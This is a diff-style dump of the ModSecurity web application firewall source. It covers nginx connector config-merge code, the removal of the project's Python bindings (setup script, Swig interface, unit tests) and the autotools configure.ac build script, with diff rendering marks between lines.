cln->data = conf;
|
||||
|
||||
dd ("conf created at: '%p'", conf);
|
||||
|
||||
return conf;
|
||||
}
|
||||
|
||||
|
||||
static char *
|
||||
ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child)
|
||||
{
|
||||
ngx_http_modsecurity_conf_t *p = parent;
|
||||
ngx_http_modsecurity_conf_t *c = child;
|
||||
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
|
||||
ngx_http_core_loc_conf_t *clcf = ngx_http_conf_get_module_loc_conf(cf, ngx_http_core_module);
|
||||
#endif
|
||||
int rules;
|
||||
const char *error = NULL;
|
||||
|
||||
dd("merging loc config [%s] - parent: '%p' child: '%p'",
|
||||
ngx_str_to_char(clcf->name, cf->pool), parent,
|
||||
child);
|
||||
|
||||
dd(" state - parent: '%d' child: '%d'",
|
||||
(int) c->enable, (int) p->enable);
|
||||
|
||||
ngx_conf_merge_value(c->enable, p->enable, 0);
|
||||
ngx_conf_merge_ptr_value(c->transaction_id, p->transaction_id, NULL);
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ngx_conf_merge_value(c->sanity_checks_enabled, p->sanity_checks_enabled, 0);
|
||||
#endif
|
||||
|
||||
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
|
||||
dd("PARENT RULES");
|
||||
msc_rules_dump(p->rules_set);
|
||||
dd("CHILD RULES");
|
||||
msc_rules_dump(c->rules_set);
|
||||
#endif
|
||||
rules = msc_rules_merge(c->rules_set, p->rules_set, &error);
|
||||
|
||||
if (rules < 0) {
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
|
||||
dd("NEW CHILD RULES");
|
||||
msc_rules_dump(c->rules_set);
|
||||
#endif
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
static void
|
||||
ngx_http_modsecurity_cleanup_instance(void *data)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
mmcf = (ngx_http_modsecurity_main_conf_t *) data;
|
||||
|
||||
dd("deleting a main conf -- instance is: \"%p\"", mmcf->modsec);
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(mmcf->pool);
|
||||
msc_cleanup(mmcf->modsec);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
}
|
||||
|
||||
|
||||
static void
|
||||
ngx_http_modsecurity_cleanup_rules(void *data)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
|
||||
mcf = (ngx_http_modsecurity_conf_t *) data;
|
||||
|
||||
dd("deleting a loc conf -- RuleSet is: \"%p\"", mcf->rules_set);
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(mcf->pool);
|
||||
msc_rules_cleanup(mcf->rules_set);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
}
|
||||
|
||||
|
||||
/* vi:set ft=c ts=4 sw=4 et fdm=marker: */
|
|
@ -1,10 +0,0 @@
|
|||
# Introduction
|
||||
|
||||
The following are a set of Swig generated Python bindings for libmodsecurity. These bindings will allow users to utilize the exposed libmodsecurity interfaces directly from python, without the use of ctypes.
|
||||
|
||||
# Compilation
|
||||
|
||||
Although these are python scripts DO NOT use setup.py to compile this. Instead, one should use the Makefile in order to compile these. This can be done by typing 'make'. Be aware that the Python development headers are required to build this package. These can be obtained on RHEL via 'dnf install python-devel'
|
||||
|
||||
|
||||
|
|
@ -1 +0,0 @@
|
|||
from modsecurity import *
|
|
@ -1,63 +0,0 @@
|
|||
/*
|
||||
* ModSecurity, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
* Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
|
||||
*
|
||||
*/
|
||||
|
||||
%module modsecurity
|
||||
|
||||
%include "std_string.i"
|
||||
%include "std_vector.i"
|
||||
%include "std_sstream.i"
|
||||
%include "attribute.i"
|
||||
%include "carrays.i"
|
||||
%include "typemaps.i"
|
||||
|
||||
#%ignore RulesProperties::parserError;
|
||||
|
||||
%{
|
||||
#include "modsecurity/intervention.h"
|
||||
#include "modsecurity/transaction/variable.h"
|
||||
#include "modsecurity/transaction/variables.h"
|
||||
#include "modsecurity/transaction/collection.h"
|
||||
#include "modsecurity/transaction/collections.h"
|
||||
#include "modsecurity/transaction.h"
|
||||
#include "modsecurity/debug_log.h"
|
||||
#include "modsecurity/modsecurity.h"
|
||||
#include "modsecurity/rules_properties.h"
|
||||
#include "modsecurity/rules.h"
|
||||
#include "modsecurity/rule.h"
|
||||
|
||||
using std::basic_string;
|
||||
%}
|
||||
|
||||
%ignore modsecurity::RulesProperties::parserError const;
|
||||
|
||||
%include "modsecurity/intervention.h"
|
||||
%include "modsecurity/transaction/variable.h"
|
||||
%include "modsecurity/transaction/variables.h"
|
||||
%include "modsecurity/transaction/collection.h"
|
||||
%include "modsecurity/transaction/collections.h"
|
||||
%include "modsecurity/transaction.h"
|
||||
%include "modsecurity/debug_log.h"
|
||||
%include "modsecurity/modsecurity.h"
|
||||
%include "modsecurity/rules_properties.h"
|
||||
%include "modsecurity/rules.h"
|
||||
%include "modsecurity/rule.h"
|
||||
|
||||
|
||||
%template(RuleVector) std::vector<modsecurity::Rule *>;
|
||||
%template(VectorOfRuleVector) std::vector<std::vector<modsecurity::Rule *> >;
|
||||
%template(StringVector) std::vector<std::string>;
|
||||
|
|
@ -1,107 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
"""
|
||||
|
||||
ModSecurity, http://www.modsecurity.org/
|
||||
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
|
||||
You may not use this file except in compliance with
|
||||
the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
If any of the files related to licensing are missing or if you have any
|
||||
other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
directly using the email address security@modsecurity.org.
|
||||
|
||||
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
|
||||
|
||||
"""
|
||||
|
||||
from distutils.core import setup, Extension
|
||||
import os
|
||||
import sys
|
||||
|
||||
possible_modsecurity_dirs = [
|
||||
"/usr/local/modsecurity/",
|
||||
"/usr/",
|
||||
"/usr/local/"
|
||||
]
|
||||
|
||||
libraries_dir = [
|
||||
"lib/",
|
||||
"lib64/"
|
||||
]
|
||||
|
||||
headers_dir = [
|
||||
"include/",
|
||||
"headers/",
|
||||
"./"
|
||||
]
|
||||
|
||||
def find_modsec():
|
||||
for i in possible_modsecurity_dirs:
|
||||
lib = None
|
||||
inc = None
|
||||
|
||||
for j in libraries_dir:
|
||||
p = os.path.join(i, j, "libmodsecurity.so")
|
||||
if os.path.isfile(p) or os.path.islink(p):
|
||||
lib = os.path.join(i, j)
|
||||
|
||||
for x in headers_dir:
|
||||
p = os.path.join(i, x, os.path.join("modsecurity", "modsecurity.h"))
|
||||
if os.path.isfile(p) or os.path.islink(p):
|
||||
inc = os.path.join(i, x)
|
||||
|
||||
if inc != None and lib != None:
|
||||
return (inc, lib)
|
||||
|
||||
return (None, None)
|
||||
|
||||
inc_dir, lib_dir = find_modsec()
|
||||
|
||||
|
||||
print "*** found modsecurity at:"
|
||||
print " headers: " + str(inc_dir)
|
||||
print " library: " + str(lib_dir)
|
||||
|
||||
|
||||
if inc_dir == None or lib_dir == None:
|
||||
print "libModSecurity was not found in your system."
|
||||
print "Make sure you have libModSecurity correctly installed in your system."
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
#if os.path.isfile("modsecurity/_modsecurity_module.cc") == False:
|
||||
# print "Swig generated code was not found. Please run `make' first"
|
||||
# sys.exit(1)
|
||||
|
||||
|
||||
extension_mod = Extension(
|
||||
"_modsecurity", [
|
||||
"modsecurity/modsecurity_wrap.cxx"
|
||||
],
|
||||
libraries=["modsecurity"],
|
||||
swig_opts=['-Wextra', '-builtin'],
|
||||
library_dirs=[lib_dir],
|
||||
runtime_library_dirs=[lib_dir],
|
||||
include_dirs=[inc_dir, "."],
|
||||
extra_compile_args=["-std=c++11"]
|
||||
)
|
||||
|
||||
|
||||
setup(
|
||||
name = "modsecurity",
|
||||
description = 'Python Bindings for libModSecurity',
|
||||
author = 'Felipe Zimmerle',
|
||||
author_email = 'felipe@zimmerle.org',
|
||||
url = 'https://github.com/SpiderLabs/ModSecurity-Python-bindings',
|
||||
ext_modules = [extension_mod],
|
||||
packages = ['modsecurity'],
|
||||
classifiers = [
|
||||
'Topic :: Security',
|
||||
'Topic :: Internet :: WWW/HTTP'
|
||||
]
|
||||
)
|
||||
|
||||
|
|
@ -1,54 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
"""
|
||||
|
||||
ModSecurity, http://www.modsecurity.org/
|
||||
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
|
||||
You may not use this file except in compliance with
|
||||
the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
If any of the files related to licensing are missing or if you have any
|
||||
other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
directly using the email address security@modsecurity.org.
|
||||
|
||||
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
|
||||
|
||||
"""
|
||||
|
||||
import sys
|
||||
import unittest
|
||||
|
||||
sys.path.append("..")
|
||||
sys.path.append(".")
|
||||
import modsecurity
|
||||
|
||||
|
||||
class TestStringMethods(unittest.TestCase):
|
||||
|
||||
def test_version(self):
|
||||
self.assertRegexpMatches(str(modsecurity.ModSecurity().whoAmI()), ".*ModSecurity.*")
|
||||
|
||||
def test_load_rules(self):
|
||||
rules = modsecurity.Rules()
|
||||
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"')
|
||||
self.assertEqual(ret, 1)
|
||||
ret = rules.load("""
|
||||
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"
|
||||
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:2,deny,phase:2"
|
||||
""")
|
||||
self.assertEqual(ret, 2)
|
||||
ret = rules.getRulesForPhase(3)
|
||||
self.assertEqual(ret.size(), 3)
|
||||
|
||||
def test_load_bad_rules(self):
|
||||
rules = modsecurity.Rules()
|
||||
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "deny,phase:2"')
|
||||
self.assertEqual(ret, -1)
|
||||
ret = rules.getParserError()
|
||||
self.assertRegexpMatches(ret, "Rules must have an ID.*")
|
||||
|
||||
if __name__ == '__main__':
|
||||
unittest.main()
|
||||
|
|
@ -1,639 +0,0 @@
|
|||
# ModSecurity configure.ac
|
||||
|
||||
|
||||
# Get the hash of the last commit, to be used if it is not an
|
||||
# official release.
|
||||
AC_DEFUN([MSC_GIT_HASH], m4_esyscmd_s(git log -1 --format="%h" --abbrev-commit))
|
||||
AC_DEFUN([MSC_MAJOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MAJOR " | awk {'print $3'} | sed 's/\"//g'))
|
||||
AC_DEFUN([MSC_MINOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MINOR " | awk {'print $3'} | sed 's/\"//g'))
|
||||
AC_DEFUN([MSC_PATCHLEVEL], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_PATCHLEVEL " | awk {'print $3'} | sed 's/\"//g'))
|
||||
AC_DEFUN([MSC_TAG], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_FTAG " | awk {'print $3'} | sed 's/\"//g'))
|
||||
|
||||
|
||||
# Version definition to be further used by AC_INIT and
|
||||
# .so file naming.
|
||||
m4_define([msc_version_major], [MSC_MAJOR])
|
||||
m4_define([msc_version_minor], [MSC_MINOR])
|
||||
m4_define([msc_version_patchlevel], [MSC_PATCHLEVEL])
|
||||
|
||||
m4_define([msc_version_c_plus_a], [m4_eval(msc_version_major + msc_version_minor)])
|
||||
|
||||
|
||||
m4_define([msc_version],
|
||||
[msc_version_major.msc_version_minor])
|
||||
|
||||
m4_define([msc_version_with_patchlevel],
|
||||
[msc_version_major.msc_version_minor.msc_version_patchlevel])
|
||||
|
||||
m4_define([msc_version_git],
|
||||
[m4_esyscmd_s(git describe)])
|
||||
|
||||
m4_define([msc_version_info],
|
||||
[msc_version_c_plus_a:msc_version_patchlevel:msc_version_minor])
|
||||
|
||||
|
||||
# Project Information
|
||||
AC_INIT([modsecurity], [3.0], [security@modsecurity.org])
|
||||
|
||||
|
||||
# General definitions
|
||||
AC_CONFIG_MACRO_DIR([build])
|
||||
AC_PREFIX_DEFAULT([/usr/local/modsecurity])
|
||||
|
||||
|
||||
# General automake options.
|
||||
AM_INIT_AUTOMAKE([-Wall -Werror foreign subdir-objects])
|
||||
|
||||
|
||||
# Check for dependencies (C++, AR, Lex, Yacc and Make)
|
||||
AC_PROG_CXX
|
||||
AM_PROG_AR
|
||||
AC_PROG_MAKE_SET
|
||||
PKG_PROG_PKG_CONFIG
|
||||
|
||||
|
||||
# Check if the compiler is c++11 compatible.
|
||||
# AX_CXX_COMPILE_STDCXX_11(,mandatory)
|
||||
|
||||
# Check for libinjection
|
||||
if ! test -f "${srcdir}/others/libinjection/src/libinjection_html5.c"; then
|
||||
AC_MSG_ERROR([\
|
||||
|
||||
|
||||
libInjection was not found within ModSecurity source directory.
|
||||
|
||||
libInjection code is available as part of ModSecurity source code in a format
|
||||
of a git-submodule. git-submodule allow us to specify the correct version of
|
||||
libInjection and still uses the libInjection repository to download it.
|
||||
|
||||
You can download libInjection using git:
|
||||
|
||||
$ git submodule init
|
||||
$ git submodule update
|
||||
|
||||
])
|
||||
fi
|
||||
# Libinjection version
|
||||
AC_DEFUN([LIBINJECTION_VERSION], m4_esyscmd_s(cd "others/libinjection" && git describe && cd ../..))
|
||||
|
||||
# SecLang test version
|
||||
AC_DEFUN([SECLANG_TEST_VERSION], m4_esyscmd_s(cd "test/test-cases/secrules-language-tests" && git log -1 --format="%h" --abbrev-commit && cd ../../..))
|
||||
|
||||
|
||||
# Check for yajl
|
||||
PROG_YAJL
|
||||
|
||||
AM_CONDITIONAL([YAJL_VERSION], [test "$YAJL_VERSION" != ""])
|
||||
|
||||
# Check for LibGeoIP
|
||||
PROG_GEOIP
|
||||
AM_CONDITIONAL([GEOIP_CFLAGS], [test "GEOIP_CFLAGS" != ""])
|
||||
|
||||
# Check for MaxMind
|
||||
PROG_MAXMIND
|
||||
AM_CONDITIONAL([MAXMIND_CFLAGS], [test "MAXMIND_CFLAGS" != ""])
|
||||
|
||||
|
||||
# Check for LMDB
|
||||
PROG_LMDB
|
||||
AM_CONDITIONAL([LMDB_CFLAGS], [test "LMDB_CFLAGS" != ""])
|
||||
|
||||
# Check for SSDEEP
|
||||
CHECK_SSDEEP
|
||||
AM_CONDITIONAL([SSDEEP_CFLAGS], [test "SSDEEP_CFLAGS" != ""])
|
||||
|
||||
# Check for LUA
|
||||
CHECK_LUA
|
||||
AM_CONDITIONAL([LUA_CFLAGS], [test "LUA_CFLAGS" != ""])
|
||||
|
||||
|
||||
#
|
||||
# Check for curl
|
||||
#
|
||||
CHECK_CURL
|
||||
|
||||
if ! test -z "${CURL_VERSION}"; then
|
||||
AC_DEFINE([MSC_WITH_CURL], [1], [Define if libcurl is available])
|
||||
fi
|
||||
|
||||
|
||||
#
|
||||
# Check for LibXML
|
||||
#
|
||||
CHECK_LIBXML2
|
||||
|
||||
|
||||
#
|
||||
# Check for libpcre
|
||||
#
|
||||
CHECK_PCRE
|
||||
|
||||
|
||||
#
|
||||
# Check for pcre2
|
||||
#
|
||||
PROG_PCRE2
|
||||
AM_CONDITIONAL([PCRE2_CFLAGS], [test "PCRE2_CFLAGS" != ""])
|
||||
|
||||
|
||||
# Checks for header files.
|
||||
AC_HEADER_STDC
|
||||
AC_CHECK_HEADERS([string])
|
||||
AC_CHECK_HEADERS([iostream])
|
||||
AC_CHECK_HEADERS([sys/utsname.h])
|
||||
|
||||
|
||||
# ??
|
||||
LT_INIT([dlopen])
|
||||
|
||||
# Identify platform
|
||||
AC_CANONICAL_HOST
|
||||
|
||||
case $host in
|
||||
*-*-aix*)
|
||||
echo "Checking platform... Identified as AIX"
|
||||
AC_DEFINE([AIX], [1], [Define if the operating system is AIX])
|
||||
PLATFORM="AIX"
|
||||
;;
|
||||
*-*-hpux*)
|
||||
echo "Checking platform... Identified as HPUX"
|
||||
AC_DEFINE([HPUX], [1], [Define if the operating system is HPUX])
|
||||
PLATFORM="HPUX"
|
||||
;;
|
||||
*-*-darwin*)
|
||||
echo "Checking platform... Identified as Macintosh OS X"
|
||||
AC_DEFINE([MACOSX], [1], [Define if the operating system is Macintosh OSX])
|
||||
PLATFORM="MacOSX"
|
||||
;;
|
||||
*-*-linux* | *-*uclinux*)
|
||||
echo "Checking platform... Identified as Linux"
|
||||
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
|
||||
PLATFORM="Linux"
|
||||
;;
|
||||
*-*-solaris*)
|
||||
echo "Checking platform... Identified as Solaris"
|
||||
AC_DEFINE([SOLARIS], [1], [Define if the operating system is SOLARIS])
|
||||
PLATFORM="Solaris"
|
||||
;;
|
||||
*-*-freebsd*)
|
||||
echo "Checking platform... Identified as FreeBSD"
|
||||
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
|
||||
PLATFORM="FreeBSD"
|
||||
;;
|
||||
*-*-netbsd*)
|
||||
echo "Checking platform... Identified as NetBSD"
|
||||
AC_DEFINE([NETBSD], [1], [Define if the operating system is NETBSD])
|
||||
PLATFORM="NetBSD"
|
||||
;;
|
||||
*-*-openbsd*)
|
||||
echo "Checking platform... Identified as OpenBSD"
|
||||
AC_DEFINE([OPENBSD], [1], [Define if the operating system is OPENBSD])
|
||||
PLATFORM="OpenBSD"
|
||||
;;
|
||||
*-*-kfreebsd*)
|
||||
echo "Checking platform... Identified as kFreeBSD, treating as linux"
|
||||
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
|
||||
PLATFORM="kFreeBSD"
|
||||
;;
|
||||
*-*-dragonfly*)
|
||||
echo "Checking platform... Identified as DragonFlyBSD, treating as linux"
|
||||
AC_DEFINE([DRAGONFLY], [1], [Define if the operating system is DRAGONFLY])
|
||||
PLATFORM="DragonFly"
|
||||
;;
|
||||
*-*-gnu*.*)
|
||||
echo "Checking platform... Identified as HURD, treating as linux"
|
||||
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
|
||||
PLATFORM="HURD"
|
||||
;;
|
||||
*)
|
||||
echo "Unknown CANONICAL_HOST $host"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
# Variables to be used inside the Makefile.am files.
|
||||
MSC_BASE_DIR=`pwd`
|
||||
AC_SUBST([MSC_BASE_DIR])
|
||||
|
||||
MSC_VERSION_INFO=msc_version_info
|
||||
AC_SUBST([MSC_VERSION_INFO])
|
||||
|
||||
MSC_VERSION_WITH_PATCHLEVEL=msc_version_with_patchlevel
|
||||
AC_SUBST([MSC_VERSION_WITH_PATCHLEVEL])
|
||||
|
||||
MSC_VERSION=msc_version
|
||||
AC_SUBST([MSC_VERSION])
|
||||
|
||||
MSC_GIT_VERSION=msc_version_git
|
||||
AC_SUBST([MSC_GIT_VERSION])
|
||||
|
||||
|
||||
AC_ARG_ENABLE(debug-logs,
|
||||
[AS_HELP_STRING([--disable-debug-logs],[Turn off the SecDebugLog feature])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) debugLogs=true ;;
|
||||
no) debugLogs=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-debug-logs) ;;
|
||||
esac],
|
||||
|
||||
[debugLogs=true]
|
||||
)
|
||||
if test "$debugLogs" != "true"; then
|
||||
MODSEC_NO_LOGS="-DNO_LOGS=1"
|
||||
AC_SUBST(MODSEC_NO_LOGS)
|
||||
fi
|
||||
|
||||
|
||||
# Fuzzer
|
||||
AC_ARG_ENABLE(afl-fuzz,
|
||||
[AS_HELP_STRING([--enable-afl-fuzz],[Turn on the afl fuzzer compilation utilities])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) aflFuzzer=true ;;
|
||||
no) aflFuzzer=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-afl-fuzz) ;;
|
||||
esac],
|
||||
|
||||
[aflFuzzer=false]
|
||||
)
|
||||
|
||||
# Examples
|
||||
AC_ARG_ENABLE(examples,
|
||||
[AS_HELP_STRING([--enable-examples],[Turn on the examples compilation (default option)])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) buildExamples=true ;;
|
||||
no) buildExamples=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-examples) ;;
|
||||
esac],
|
||||
|
||||
[buildExamples=true]
|
||||
)
|
||||
|
||||
# Parser
|
||||
AC_ARG_ENABLE(parser-generation,
|
||||
[AS_HELP_STRING([--enable-parser-generation],[Enables parser generation during the build])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) buildParser=true ;;
|
||||
no) buildParser=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-parser-generation) ;;
|
||||
esac],
|
||||
|
||||
[buildParser=false]
|
||||
)
|
||||
|
||||
# Mutex
|
||||
AC_ARG_ENABLE(mutex-on-pm,
|
||||
[AS_HELP_STRING([--enable-mutex-on-pm],[Treats pm operations as a critical section])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) mutexPm=true ;;
|
||||
no) mutexPm=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-mutex-on-pm) ;;
|
||||
esac],
|
||||
|
||||
[mutexPm=false]
|
||||
)
|
||||
if test "$mutexPm" == "true"; then
|
||||
MODSEC_MUTEX_ON_PM="-DMUTEX_ON_PM=1"
|
||||
AC_SUBST(MODSEC_MUTEX_ON_PM)
|
||||
fi
|
||||
|
||||
|
||||
if test $buildParser = true; then
|
||||
AC_PROG_YACC
|
||||
AC_PROG_LEX
|
||||
AC_PATH_PROG([FLEX], [flex])
|
||||
test "x$FLEX" = "x" && AC_MSG_ERROR([flex is needed to build ModSecurity])
|
||||
|
||||
AC_PATH_PROG([BISON], [bison])
|
||||
test "x$BISON" = "x" && AC_MSG_ERROR([bison is needed to build ModSecurity])
|
||||
|
||||
AC_PATH_PROG([YACC_INST], $YACC)
|
||||
if test ! -f "$srcdir/gram.c"; then
|
||||
if test -z "$YACC_INST"; then
|
||||
AC_MSG_ERROR([yacc not found - unable to compile ModSecurity])
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
|
||||
# Decide if we want to build the tests or not.
|
||||
# buildTestUtilities=false
|
||||
# if test "x$YAJL_FOUND" = "x1"; then
|
||||
# Regression tests will not be able to run without the logging support.
|
||||
# But we still have the unit tests.
|
||||
# if test "$debugLogs" = "true"; then
|
||||
# buildTestUtilities=true
|
||||
# fi
|
||||
# fi
|
||||
|
||||
|
||||
AM_CONDITIONAL([TEST_UTILITIES], [test $buildTestUtilities = true])
|
||||
if test $buildTestUtilities = true; then
|
||||
if test $debugLogs = true; then
|
||||
if test -f ./test/test-list.sh; then
|
||||
TEST_CASES=`./test/test-list.sh`
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
AM_CONDITIONAL([EXAMPLES], [test $buildExamples = true])
|
||||
AM_CONDITIONAL([BUILD_PARSER], [test $buildParser = true])
|
||||
AM_CONDITIONAL([USE_MUTEX_ON_PM], [test $mutexPm = true])
|
||||
|
||||
|
||||
# General link options
|
||||
if test "$PLATFORM" != "MacOSX" -a "$PLATFORM" != "OpenBSD"; then
|
||||
GLOBAL_LDADD="-lrt "
|
||||
fi
|
||||
|
||||
if test "$aflFuzzer" == "true"; then
|
||||
FUZZ_CPPCFLAGS="-fsanitize=address -fsanitize-coverage=4 "
|
||||
GLOBAL_LDADD="$GLOBAL_LDADD -fsanitize=address "
|
||||
GLOBAL_CPPFLAGS="$GLOBAL_CPPFLAGS $FUZZ_CPPCFLAGS"
|
||||
$buildExamples = false
|
||||
fi
|
||||
AC_SUBST(GLOBAL_LDADD)
|
||||
AC_SUBST(GLOBAL_CPPFLAGS)
|
||||
|
||||
AM_CONDITIONAL([AFL_FUZZER], [test $aflFuzzer = true])
|
||||
|
||||
GLOBAL_CFLAGS=""
|
||||
AC_SUBST(GLOBAL_CFLAGS)
|
||||
|
||||
# Files to be generated via autotools.
|
||||
AC_CONFIG_FILES([\
|
||||
modsecurity.pc \
|
||||
Makefile \
|
||||
doc/Makefile \
|
||||
src/Makefile \
|
||||
others/Makefile \
|
||||
tools/Makefile \
|
||||
tools/rules-check/Makefile
|
||||
])
|
||||
|
||||
AM_COND_IF([TEST_UTILITIES],
|
||||
[AC_CONFIG_FILES([test/Makefile test/benchmark/Makefile])])
|
||||
|
||||
AM_COND_IF([EXAMPLES],
|
||||
[AC_CONFIG_FILES([ \
|
||||
examples/Makefile \
|
||||
examples/simple_example_using_c/Makefile \
|
||||
examples/multiprocess_c/Makefile \
|
||||
examples/reading_logs_with_offset/Makefile \
|
||||
examples/reading_logs_via_rule_message/Makefile \
|
||||
examples/using_bodies_in_chunks/Makefile \
|
||||
])])
|
||||
|
||||
AM_COND_IF([AFL_FUZZER],
|
||||
[AC_CONFIG_FILES([test/fuzzer/Makefile])])
|
||||
|
||||
AM_COND_IF([BUILD_PARSER],
|
||||
[AC_CONFIG_FILES([src/parser/Makefile])])
|
||||
|
||||
|
||||
AC_CONFIG_HEADERS([src/config.h])
|
||||
|
||||
|
||||
# Doxygen support
|
||||
DX_HTML_FEATURE(ON)
|
||||
DX_CHM_FEATURE(OFF)
|
||||
DX_CHI_FEATURE(OFF)
|
||||
DX_MAN_FEATURE(OFF)
|
||||
DX_RTF_FEATURE(OFF)
|
||||
DX_XML_FEATURE(OFF)
|
||||
DX_PDF_FEATURE(OFF)
|
||||
DX_PS_FEATURE(OFF)
|
||||
|
||||
DX_INIT_DOXYGEN([ModSecurity],[doc/doxygen.cfg])
|
||||
|
||||
# make check-valgrind
|
||||
AX_VALGRIND_DFLT([sgcheck], [off])
|
||||
AX_VALGRIND_CHECK
|
||||
|
||||
# Generate the files.
|
||||
AC_OUTPUT
|
||||
|
||||
|
||||
# Print a fancy summary
|
||||
echo " "
|
||||
echo " "
|
||||
echo "ModSecurity - ${MSC_GIT_VERSION} for $PLATFORM"
|
||||
echo " "
|
||||
echo " Mandatory dependencies"
|
||||
echo -n " + libInjection ...."
|
||||
echo LIBINJECTION_VERSION
|
||||
echo -n " + SecLang tests ...."
|
||||
echo SECLANG_TEST_VERSION
|
||||
|
||||
echo " "
|
||||
echo " Optional dependencies"
|
||||
|
||||
|
||||
|
||||
## GeoIP - MaxMind
|
||||
if test "x$GEOIP_FOUND" = "x0" && test "x$MAXMIND_FOUND" = "x0"; then
|
||||
echo " + GeoIP/MaxMind ....not found"
|
||||
fi
|
||||
if test "x$GEOIP_FOUND" = "x1" || test "x$MAXMIND_FOUND" = "x1"; then
|
||||
echo -n " + GeoIP/MaxMind ....found "
|
||||
echo ""
|
||||
if test "x$MAXMIND_FOUND" = "x1"; then
|
||||
echo " * (MaxMind) v${MAXMIND_VERSION}"
|
||||
echo " ${MAXMIND_DISPLAY}"
|
||||
fi
|
||||
if test "x$GEOIP_FOUND" = "x1"; then
|
||||
echo " * (GeoIP) v${GEOIP_VERSION}"
|
||||
echo " ${GEOIP_DISPLAY}"
|
||||
fi
|
||||
fi
|
||||
if test "x$GEOIP_FOUND" = "x2" && test "x$MAXMIND_FOUND" = "x2"; then
|
||||
echo " + GeoIP/MaxMind ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## LibCurl
|
||||
if test "x$CURL_FOUND" = "x0"; then
|
||||
echo " + LibCURL ....not found"
|
||||
fi
|
||||
if test "x$CURL_FOUND" = "x1"; then
|
||||
echo -n " + LibCURL ....found "
|
||||
if ! test "x$CURL_VERSION" = "x"; then
|
||||
echo "v${CURL_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${CURL_DISPLAY}"
|
||||
fi
|
||||
if test "x$CURL_FOUND" = "x2"; then
|
||||
echo " + LibCURL ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## YAJL
|
||||
if test "x$YAJL_FOUND" = "x0"; then
|
||||
echo " + YAJL ....not found"
|
||||
fi
|
||||
if test "x$YAJL_FOUND" = "x1"; then
|
||||
echo -n " + YAJL ....found "
|
||||
if ! test "x$YAJL_VERSION" = "x"; then
|
||||
echo "v${YAJL_VERSION}"
|
||||
else
|
||||
echo ""
|
||||
fi
|
||||
echo " ${YAJL_DISPLAY}"
|
||||
fi
|
||||
if test "x$YAJL_FOUND" = "x2"; then
|
||||
echo " + YAJL ....disabled"
|
||||
fi
|
||||
|
||||
|
||||
## LMDB
|
||||
if test "x$LMDB_FOUND" = "x0"; then
|
||||
echo " + LMDB ....not found"
|
||||
fi
|
||||
if test "x$LMDB_FOUND" = "x1"; then
|
||||
echo -n " + LMDB ....found "
